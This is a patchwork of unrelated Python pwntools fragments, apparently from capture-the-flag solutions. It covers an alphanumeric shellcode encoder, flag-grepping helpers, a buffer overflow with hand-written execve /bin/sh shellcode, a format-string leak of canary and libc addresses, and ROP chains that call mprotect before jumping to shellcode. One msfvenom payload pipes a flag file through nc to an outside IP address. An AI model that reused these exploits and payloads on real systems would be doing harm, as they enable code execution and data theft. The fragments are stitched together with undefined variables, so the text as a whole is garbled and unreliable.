def encode(self,raw_sc,addr_in_reg='rax',pre_len=0,is_rdi_zero=0):
r'''
raw_sc:需要encode的机器码
addr_in_reg: 指向shellcode附近的寄存器名称,默认rax
pre_len:因为默认rax指向shellcode附近,这个字段的意思为 reg+pre_len == encoder的起始地址,默认0
is_rdi_zero: 跑shellcode之前rdi是否为0,如果确定为0,可以设置此flag为1,这样可以省去几byte空间,默认0即rdi不为0
encoder_len:留给encoder的最大字节长度(会自动调整)
地址构成:
rax --> xxxxx \
xxxxx | pre_len (adjust addr to rax)
xxxxx /
encoder yyyyy \
yyyyy | encoder_len
yyyyy /
your_sc zzzzz \
zzzzz | encoded shellcode
zzzzz |
zzzzz /
'''
save_log_level = context.log_level
context.log_level = 99
if not is_rdi_zero:
self.prologue = self.zero_rdi+self.init_encoder
else:
self.prologue = self.init_encoder
addr_in_reg=addr_in_reg.lower()
if addr_in_reg != 'rax':
if addr_in_reg not in self.vaild_reg:
print '[-] not vaild reg'
return None
else:
self.prologue=asm('push {};pop rax;\n'.format(addr_in_reg))+self.prologue
self.raw_sc = raw_sc
self.pre_len = pre_len
self.encoder_len=len(self.prologue)
if not self.encode_raw_sc():
print '[-] error while encoding raw_sc'
return None
while True:
debug('AE64: trying length {}'.format(self.encoder_len))
encoder = asm(self.gen_encoder(self.pre_len+self.encoder_len))
final_sc = self.prologue+encoder
if self.encoder_len >= len(final_sc) and self.encoder_len-len(final_sc) <= 6:# nop len
break
self.encoder_len=len(final_sc)
nop_len = self.encoder_len - len(final_sc)
context.log_level = save_log_level
success('shellcode generated, length info -> prologue:{} + encoder:{} + nop:{} + encoded_sc:{} == {}'.format(
len(self.prologue),
len(final_sc)-len(self.prologue),
nop_len,
len(self.enc_raw_sc),
len(final_sc)+nop_len+len(self.enc_raw_sc)))
final_sc += self.nop2*(nop_len/2)+self.nop*(nop_len%2)+self.enc_raw_sc
return final_sc
def testString(a, b): # {{{
src = a
tgt = b
if str(src) == str(tgt):
pwn.success("{} est un palindrome".format(tgt))
else:
pwn.warn("{} n'est pas un palindrome".format(tgt))
return # }}}
def FlagFinder(cible, flag): # {{{
regex = flag
file = cible
t = pwn.read(file)
c = re.findall(regex, str(t))
if not c:
pwn.warn("Flag non trouvé")
else:
for a in c:
pwn.success("Yeah !!!! flag found: {result}\n".format(result=a))
pwn.warn("flag is now copied in flag.txt")
pwn.write("flag.txt", a)
def Exploit(fichier, pattern):
regex = pattern
file = fichier
pwn.info("Opening file: {fichier}\n".format(fichier=file))
s = pwn.read(file)
pwn.info("Searching for pattern: {flag}\n".format(flag=regex))
c = re.findall(regex, str(s))
if not c:
pwn.warn("No flag for you my friend, check your regex")
else:
for a in c:
pwn.success("Yeah !!!! flag found: {result}\n".format(result=a))
pwn.warn("flag is now copied in flag.txt")
pwn.write("flag.txt", a)
def Online(url, pattern):
regex = pattern
file = url
pwn.info("Opening file: {fichier}\n".format(fichier=file))
r = requests.session()
s = r.get(file)
s = s.content
pwn.info("Search for pattern: {flag}\n".format(flag=regex))
c = re.findall(regex, str(s))
if not c:
pwn.warn("No flag for you my friend, check your regex")
else:
for a in c:
pwn.success("Yeah !!!! flag found: {result}\n".format(result=a))
pwn.warn("flag is now copied in flag.txt")
pwn.write("flag.txt", a)
def third_attempt(remote):
length_before_return_address = 0x14
write_address = 0x08048087
payload = b'A' * length_before_return_address + pwn.p32(write_address)
remote.send(payload)
esp_bytes = 4
bytes_to_receive = 0x14
esp = pwn.u32(remote.recv(esp_bytes))
pwn.info('ESP was %d' % esp)
remote.recv(bytes_to_receive - esp_bytes) # Not used
# shellcode = pwn.asm(pwn.shellcraft.sh()) # too long, manually reduced below
shellcode = pwn.asm(
'''
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp
xor ecx, ecx
xor edx, edx
/* call execve() */
push 11 /* 0xb */
pop eax
int 0x80
''')
payload = b'A' * length_before_return_address + \
pwn.p32(esp + length_before_return_address) + \
shellcode
assert len(payload) <= 60, len(payload)
remote.send(payload)
remote.sendline('cat /home/start/flag')
pwn.success('Flag is: %s' % remote.recvuntil('\n').rstrip().decode('utf8'))
remote.interactive()
def leak(payload):
headers = {"User-Agent": payload}
params = {"toy": b64encode('fsb\0')}
r = requests.get(URL, headers=headers, params=params)
l = re.findall(r'''<br>\[GET\] / - (.*)</small></footer></body></html>''',
r.text)[0].split('.')
canary = int(l[0], 16)
success("canary -> {:#x}".format(canary))
stack = int(l[1], 16) >> 12 << 12
success("stack -> {:#x}".format(stack))
libc.address = int(l[2], 16) - libc.sym['__libc_start_main'] - 231
success("libc -> {:#x}".format(libc.address))
return canary, stack
import pwn
host = "192.168.1.251"
port = 2999
r = pwn.remote(host, port)
message = r.recvline().strip()
number = int(message.decode().split("'")[1])
pwn.info(message)
r.sendline(pwn.p32(number))
pwn.success(r.recvline().strip())
r.close()
filename="./db/"+sys.argv[1]
inputbuf=sys.argv[2]
check=0
if '&' in inputbuf:
check=1
regs=inputbuf.replace("&"," ").split()
else:
regs=inputbuf.replace("|"," ").split()
fp=open(filename,"r")
while True:
tmp=fp.readline()
if not tmp or tmp=='\n':
break
res=json.loads(tmp[:-1])
if check:
if res.get(regs[0])==0 and res.get(regs[1])==0:
printbuf=''
for i,j in res.items():
printbuf+=i+":"+hex(j)+" "
printbuf+="\n"
success(printbuf)
else:
if res.get(regs[0])==0 or res.get(regs[1])==0:
printbuf=''
for i,j in res.items():
printbuf+=i+":"+hex(j)+" "
printbuf+="\n"
success(printbuf)
fp.close()
pwn.info("Round %d: Trying %d (+%d)" % (solved_rounds, next_number_to_try, i))
for round in range(0, 10):
if round < solved_rounds:
io.sendline(str(solution[round]))
elif round == solved_rounds:
io.sendline(str(next_number_to_try))
else:
io.sendline(str(2 ** (round + 3)))
io.recv()
io.recvuntil('ok, lets run the experiment with your configuration\n')
newlines_per_solved_round = 4
with pwn.context.local(log_level='error'):
results = io.recvall()
lines = results.strip().split(b'\n')
progress_to_round = int(len(lines) / newlines_per_solved_round) - 1
if b'flag :' in results:
pwn.success("Wooohooo. Found flag:\n%s " % lines[len(lines)-1].decode('utf8'))
keep_running = False
solved_round = True
break
if progress_to_round > solved_rounds:
solution.append(next_number_to_try)
solved_rounds += 1
pwn.success("Yay. Found solution for round %d: %d\nSolution so far: %s" %
(solved_rounds, next_number_to_try, solution))
solved_round = True
break
assert solved_round
def get_absolute_stack_address_below_main():
offset = read_stack_offset(esp_placed_at_offset)
pwn.success("Read offset: 0x%08x" % offset)
return offset - (esp_placed_at_offset - main_ret_address_offset) * 4
def write_rop_chain_to_addr(addr, rop_chain):
assert len(rop_chain) % 4 == 0
for x in range(0, int(len(rop_chain) / 4)):
val = rop_chain[x * 4:(x + 1) * 4]
val = pwn.u32(val)
write_stack_offset(x + addr, val)
mprotect_addr = exe.symbols['mprotect']
io = start()
io.recvuntil("=== Welcome to SECPROG calculator ===\n")
stack_addr = get_absolute_stack_address_below_main()
stack_addr_mod_pagesize = stack_addr - (stack_addr % 4096)
pwn.success("Stack absolute address is 0x%08x" % stack_addr)
pwn.success("Stack absolute address mod pagesize is 0x%08x" %
stack_addr_mod_pagesize)
rop_chain = (
pwn.p32(mprotect_addr) + # return from calc, go to mprotect
pwn.p32(stack_addr + 16)
+ # return address after mprotect, go to shellcode
pwn.p32(stack_addr_mod_pagesize) + # mprotect param: addr
pwn.p32(4096) + # mprotect param: page size
pwn.p32(7) + # mprotect param: rwx
pwn.asm(pwn.shellcraft.sh()
) # shellcode after stack has been marked executable
)
pwn.debug("ROP chain:\n%s" % pwn.hexdump(rop_chain))
# msfvenom -p linux/x64/exec cmd="cat flag| nc 123.207.141.87 12345" -f python -v sc
sc = ""
sc += "\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68"
sc += "\x00\x53\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6"
sc += "\x52\xe8\x22\x00\x00\x00\x63\x61\x74\x20\x66\x6c\x61"
sc += "\x67\x7c\x20\x6e\x63\x20\x31\x32\x33\x2e\x32\x30\x37"
sc += "\x2e\x31\x34\x31\x2e\x38\x37\x20\x31\x32\x33\x34\x35"
sc += "\x00\x56\x57\x48\x89\xe6\x0f\x05"
payload = fit(
{
0x48:
flat(canary),
0x58:
flat(prdi, stack, prsi, 0x1000, prdx, 0x7, libc.sym['mprotect'],
jrsp)
},
filler='\0')
payload += sc
# raw_input("DEBUG: ")
rop(payload)
success("DONE")
'''
1. leak canary, stack address and libc.address using format string bug in router();
2. with known canary and libc.address, we're able to ROP.
3. I just want to send my payload using requests.get(), so I make a mprotect(stack, 0x1000, 7) and using rop then jump to my shellcode.
However, I've no idea why reverse_tcp shellcode failed. I guess it stucks in requests.get. Please kindly let me know if you know the answer.
'''